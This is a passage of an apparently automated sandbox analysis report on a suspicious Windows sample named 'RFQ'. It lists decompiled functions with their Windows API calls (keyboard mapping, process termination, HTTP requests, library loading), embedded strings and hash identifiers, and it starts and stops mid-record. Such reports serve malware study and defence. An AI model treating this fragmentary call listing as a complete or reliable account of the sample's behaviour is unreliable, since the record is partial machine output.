                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2942034483-0
                                                                                                                                                    • Opcode ID: 3b238d95861e2a901d0c1ad7d06599e0ece7a0652b3dae5354e2cacfa746cf7c
                                                                                                                                                    • Instruction ID: 8bfc9e9f8b7fe2b146bf495c78e7e492b01056980b9f8934518c2d17cc74da6a
                                                                                                                                                    • Opcode Fuzzy Hash: 3b238d95861e2a901d0c1ad7d06599e0ece7a0652b3dae5354e2cacfa746cf7c
                                                                                                                                                    • Instruction Fuzzy Hash: 84F06DB210D3629AE62D76387C0BACA27849B01733B214699FC64D90D2FFAD9C49C169
                                                                                                                                                    Function 007327EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0073281D
                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00732825
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00732830
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0073283B
                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00732843
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0073284B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                    • Opcode ID: 170b1d4a26eea7f633e4a33df523c8df16c188c4f28dbf4b1360d854613dc93d
                                                                                                                                                    • Instruction ID: e3f1efe5aee0e6d0b0cef4585638b4e014b6c69d390c46125140883a11c7a929
                                                                                                                                                    • Opcode Fuzzy Hash: 170b1d4a26eea7f633e4a33df523c8df16c188c4f28dbf4b1360d854613dc93d
                                                                                                                                                    • Instruction Fuzzy Hash: 40016CB0901B5A7DE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5
                                                                                                                                                    Function 00779AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1423608774-0
                                                                                                                                                    • Opcode ID: 715631795b5699907a66776d58f34baa808546de0105d28c314d936501a2439f
                                                                                                                                                    • Instruction ID: 3f97ddeaaa68c4f5abfef0ae21c0ac768572b04383374ce8ec8cf51b82d1e406
                                                                                                                                                    • Opcode Fuzzy Hash: 715631795b5699907a66776d58f34baa808546de0105d28c314d936501a2439f
                                                                                                                                                    • Instruction Fuzzy Hash: A8018136103212EBDB295B64EC49EEB7769FF88741B05C629F607921A0EB7C9C00DB54
                                                                                                                                                    Function 00777BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00777C07
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00777C1D
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00777C2C
                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C3B
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C45
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00777C4C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                    • Opcode ID: cf64c08e1d881dd0319e0008eef1e18abd5f4735c7068fae7a1e4b58e6578fd2
                                                                                                                                                    • Instruction ID: fec74bc8ef308afd25acadab6ae8af2f6edd3c406f5569f8ef93cdd6e2dd4fb2
                                                                                                                                                    • Opcode Fuzzy Hash: cf64c08e1d881dd0319e0008eef1e18abd5f4735c7068fae7a1e4b58e6578fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 12F06772201158BBE6351B529C0EFEF3BBCEBCAB55F004218FA01A1051E7A81E41C6B9
                                                                                                                                                    Function 00779A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00779A33
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 00779A44
                                                                                                                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 00779A51
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 00779A5E
                                                                                                                                                      • Part of subcall function 007793D1: CloseHandle.KERNEL32(?,?,00779A6B,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 007793DB
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00779A71
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,007A5DEE,?,?,?,?,?,0073ED63), ref: 00779A78
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                    • Opcode ID: 4bcd038647e54980b719751ca04e2df4c2d074eccb047b5183fee574a66938fb
                                                                                                                                                    • Instruction ID: cee2b7ac90b58c9d00023f76b1d31d56e8b12879d008dda024c9da563f6109d2
                                                                                                                                                    • Opcode Fuzzy Hash: 4bcd038647e54980b719751ca04e2df4c2d074eccb047b5183fee574a66938fb
                                                                                                                                                    • Instruction Fuzzy Hash: 47F08236142211EBD7251BA4EC8DFEB7779FF84301B158625F603911A0EB7D9C11DB54
                                                                                                                                                    Function 00731CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074F4EA: std::exception::exception.LIBCMT ref: 0074F51E
                                                                                                                                                      • Part of subcall function 0074F4EA: __CxxThrowException@8.LIBCMT ref: 0074F533
                                                                                                                                                    • __swprintf.LIBCMT ref: 00731EA6
                                                                                                                                                    Strings
                                                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00731D49
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                    • API String ID: 2125237772-557222456
                                                                                                                                                    • Opcode ID: 21f059907600aff688c40392ce7bbb9ad1ee94c651d714fbdbf66b67df61c306
                                                                                                                                                    • Instruction ID: 4e14fa38cedf91518dfe6728b2a3e1859eb592957af32f7dcd230123c1b61d27
                                                                                                                                                    • Opcode Fuzzy Hash: 21f059907600aff688c40392ce7bbb9ad1ee94c651d714fbdbf66b67df61c306
                                                                                                                                                    • Instruction Fuzzy Hash: C3919E71508241EFE725EF24C899C6EB7A4FF85700F504A2DF885972A2DB39ED05CB92
                                                                                                                                                    Function 0078AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0078B006
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 0078B115
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0078B298
                                                                                                                                                      • Part of subcall function 00779DC5: VariantInit.OLEAUT32(00000000), ref: 00779E05
                                                                                                                                                      • Part of subcall function 00779DC5: VariantCopy.OLEAUT32(?,?), ref: 00779E0E
                                                                                                                                                      • Part of subcall function 00779DC5: VariantClear.OLEAUT32(?), ref: 00779E1A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                                                    • Opcode ID: b4da49a554818b0a342cdd99cd82857a12ed2caa4901743e5b8ab83cfebd1f72
                                                                                                                                                    • Instruction ID: 4293d251b4f73448b3e69c786e1b46e8cd6c5f15dea62ad6b654958a69b68ef0
                                                                                                                                                    • Opcode Fuzzy Hash: b4da49a554818b0a342cdd99cd82857a12ed2caa4901743e5b8ab83cfebd1f72
                                                                                                                                                    • Instruction Fuzzy Hash: 99916A70648301DFCB10EF24C48995ABBE4BF89704F04896DF89A9B362DB39ED45CB52
                                                                                                                                                    Function 00775347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074C6F4: _wcscpy.LIBCMT ref: 0074C717
                                                                                                                                                    • _memset.LIBCMT ref: 00775438
                                                                                                                                                    • GetMenuItemInfoW.USER32(?), ref: 00775467
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00775513
                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0077553D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 4152858687-4108050209
                                                                                                                                                    • Opcode ID: 45906f3e3111605ddacc70dfc9d577858bc705d0b93b5eff1f149d16b3c4cb7f
                                                                                                                                                    • Instruction ID: caa9b3ab00a2ca68014d54baa26011382a6517eeb412b810223c33af7a08a5e9
                                                                                                                                                    • Opcode Fuzzy Hash: 45906f3e3111605ddacc70dfc9d577858bc705d0b93b5eff1f149d16b3c4cb7f
                                                                                                                                                    • Instruction Fuzzy Hash: 515132712047019BDB14DB28C844ABBB7EAAF853A4F14862DF89DC31E1DBECCC548B52
                                                                                                                                                    Function 00770213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0077027B
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007702B1
                                                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007702C2
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00770344
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                    • API String ID: 753597075-1075368562
                                                                                                                                                    • Opcode ID: befed0d8633892157427bb892e1f1a4f587abf486ab499a385584793a71f2a34
                                                                                                                                                    • Instruction ID: 372b6404ccbf263450bd01814b6b93f1cb99acc3f2142c12be5367175464b4bc
                                                                                                                                                    • Opcode Fuzzy Hash: befed0d8633892157427bb892e1f1a4f587abf486ab499a385584793a71f2a34
                                                                                                                                                    • Instruction Fuzzy Hash: FC4139B1600208EFDF15CF64C885BAA7BA9EF45390B14C0ADA90D9F246D7B9DD45CBE0
                                                                                                                                                    Function 00775007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00775075
                                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 00775091
                                                                                                                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007750D7
                                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007F1708,00000000), ref: 00775120
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                                                    • Opcode ID: 77cff6efa9b980811d0966ee159033a2a520397d5c66ecd2ff61dd55ea3675b0
                                                                                                                                                    • Instruction ID: 86375a2c2de70cb96ff13315968f13536488cdbc1be4421982f95df284101317
                                                                                                                                                    • Opcode Fuzzy Hash: 77cff6efa9b980811d0966ee159033a2a520397d5c66ecd2ff61dd55ea3675b0
                                                                                                                                                    • Instruction Fuzzy Hash: 7941E330204705EFDB20DF28DC85F6AB7E4AF85355F148A1EF96997291D7B8E800CB62
                                                                                                                                                    Function 00790567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00790587
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                    • API String ID: 2358735015-567219261
                                                                                                                                                    • Opcode ID: af072f299cfecd67a219a2b98b529b75371cbbd27ea814b31413725d44c655eb
                                                                                                                                                    • Instruction ID: d77e2b1ac3a615ca1865b887631ca37fa15e89260135bb3dba07b527d610212d
                                                                                                                                                    • Opcode Fuzzy Hash: af072f299cfecd67a219a2b98b529b75371cbbd27ea814b31413725d44c655eb
                                                                                                                                                    • Instruction Fuzzy Hash: D831B270610216EFCF00EF68D8459EEB3B8FF55310F008629E826A76D2DB79A915CB90
                                                                                                                                                    Function 0076B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0076B88E
                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0076B8A1
                                                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0076B8D1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 3850602802-1403004172
                                                                                                                                                    • Opcode ID: 2af0c42131ebc8c4469493504fba31b58e836af57cf44eca5cb17c83c66641bb
                                                                                                                                                    • Instruction ID: 43901f99001fc2138b67a086fd13aefa26cf6839809d0e4aa629f006cc7aae61
                                                                                                                                                    • Opcode Fuzzy Hash: 2af0c42131ebc8c4469493504fba31b58e836af57cf44eca5cb17c83c66641bb
                                                                                                                                                    • Instruction Fuzzy Hash: 9621B4B1A00108FFD714AB64D88ADBE777CDF16354F148129F812A71E2DB7C5D469760
                                                                                                                                                    Function 007843E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00784401
                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00784427
                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00784457
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0078449E
                                                                                                                                                      • Part of subcall function 00785052: GetLastError.KERNEL32(?,?,007843CC,00000000,00000000,00000001), ref: 00785067
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1951874230-3916222277
                                                                                                                                                    • Opcode ID: e97c3e290902d1efd799bf0a3dced6856ee85e17fbc972c55742414b0bdd8ffe
                                                                                                                                                    • Instruction ID: af0570bf638bfae7a737545ffde46aeafc41fd84238b37a4ea7ce215d0dcca02
                                                                                                                                                    • Opcode Fuzzy Hash: e97c3e290902d1efd799bf0a3dced6856ee85e17fbc972c55742414b0bdd8ffe
                                                                                                                                                    • Instruction Fuzzy Hash: 1321A4B2540209BFE721AF64CC85FBFBAFCEB48748F10811AF509E2150EAB88D059771
                                                                                                                                                    Function 007990E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0074D1BA
                                                                                                                                                      • Part of subcall function 0074D17C: GetStockObject.GDI32(00000011), ref: 0074D1CE
                                                                                                                                                      • Part of subcall function 0074D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0074D1D8
                                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0079915C
                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00799163
                                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00799178
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00799180
